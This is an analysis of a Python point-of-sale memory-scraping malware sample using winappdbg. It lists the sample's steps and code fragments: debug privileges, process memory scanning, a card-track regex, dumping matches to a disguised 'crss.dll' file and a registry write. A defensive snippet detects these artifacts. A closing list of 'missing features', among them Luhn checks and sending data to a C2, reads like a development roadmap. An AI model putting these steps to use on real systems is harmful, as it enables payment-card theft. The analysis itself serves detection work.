Title: Memory Scanning a Windows Process in Python Using winappdbg
Purpose: Analyze Python memory scanning point-of-sale (PoS) malware for credit card data
Analysis Steps:
(1) Display the Windows version and the current architecture
from winappdbg import *
System.os, System.arch, System.bits
(2) Create a snapshot of running processes
System.request_debug_privileges(), System.scan_processes()
(3) Obtain local username (from getpass.getuser())
(4) Create a writeable file in %APPDATA%
dump_writer = open('C:\\Documents and Settings\\'+UserName+'\\Application Data\\crss.dll', 'w+')
(5) Obtain all processes that match the requested filenames:
(6) Get a memory map of the process
memoryMap = process.get_memory_map()
mappedFilenames = process.get_mapped_filenames(memoryMap)
(7) For each memory block in the map, read the block's base address and size, its state (free or allocated), its page protection bits and its memory type; the scanner only cares about committed pages (win32.MEM_COMMIT):
(8) Read the data from memory
if mbi.has_content() and mbi.State == win32.MEM_COMMIT:
(9) Implement a simple Regular Expression looking for Track2 data
import re
dump_regex = re.findall(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?', data)
dump_data.append(dump_regex)
(10) Beautify the extracted data
(11) Write dump data into crss.dll
(12) Write the data to registry
import _winreg
hKey = CreateKey(HKEY_CURRENT_USER, "SOFTWARE\\Microsoft\\Internet Explorer\\")
subKey = SetValueEx( hKey, "Test", 0, REG_BINARY, "666" )
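As an added example (not code from the page or from the analysed sample), the Python below shows what the sample's regex actually matches and checks host artifacts collected during triage against the file and registry indicators listed above. The functions `find_track_data` and `matches_sample_artifacts`, and the constructed inputs, are my own; the regex and the artifact names are the ones from the analysis.

```python
import re

# Regex copied from the sample: '%B' start sentinel, PAN, '^', cardholder
# name, '^', expiry plus service code, '?' end sentinel. Although the
# analysis labels it "Track2", this is the Track 1 layout; Track 2 data
# (';' sentinel, '=' separator) does not match it.
TRACK_REGEX = re.compile(r'%B\d{0,19}\^[\w\s\/]{2,26}\^\d{7}\w*\?')

# Host artifacts named in the analysis.
DROP_FILE = 'crss.dll'                              # dropped under %APPDATA%
REG_KEY = r'SOFTWARE\Microsoft\Internet Explorer'   # HKCU key written by the sample
REG_VALUE = 'Test'                                  # REG_BINARY value name


def find_track_data(blob):
    """Return every match of the sample's regex in a text blob, e.g. a memory
    dump taken during incident response to confirm whether card data was exposed."""
    return TRACK_REGEX.findall(blob)


def matches_sample_artifacts(file_paths, registry_values):
    """Flag the file drop and registry write described in steps (4) and (12).

    file_paths: absolute paths collected from %APPDATA%.
    registry_values: (key_path, value_name, value_type) tuples under HKCU,
    a constructed format standing in for whatever a triage script exports.
    """
    hits = []
    for path in file_paths:
        if path.lower().endswith('\\' + DROP_FILE):
            hits.append(('file', path))
    for key, name, vtype in registry_values:
        if (key.strip('\\').lower() == REG_KEY.lower()
                and name == REG_VALUE and vtype == 'REG_BINARY'):
            hits.append(('registry', key.rstrip('\\') + '\\' + name))
    return hits


# Constructed sample input: a Track 1 record using the well-known test PAN
# 4111111111111111, a Track 2 record (not matched) and unrelated memory noise.
SAMPLE_MEMORY = ('\x00\x00%B4111111111111111^DOE/JOHN^2512101000000000?\x00'
                 ';4111111111111111=25121010000000000000?\x00GET / HTTP/1.1')

if __name__ == '__main__':
    print(find_track_data(SAMPLE_MEMORY))
    print(matches_sample_artifacts(
        ['C:\\Documents and Settings\\user\\Application Data\\crss.dll'],
        [('SOFTWARE\\Microsoft\\Internet Explorer\\', 'Test', 'REG_BINARY')]))
```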
Missing features are as follows:
(1) Encode Saved Data
(2) Add Luhn Algorithm
(3) Create a multithreaded process for this algorithm
(4) Send data to email/C2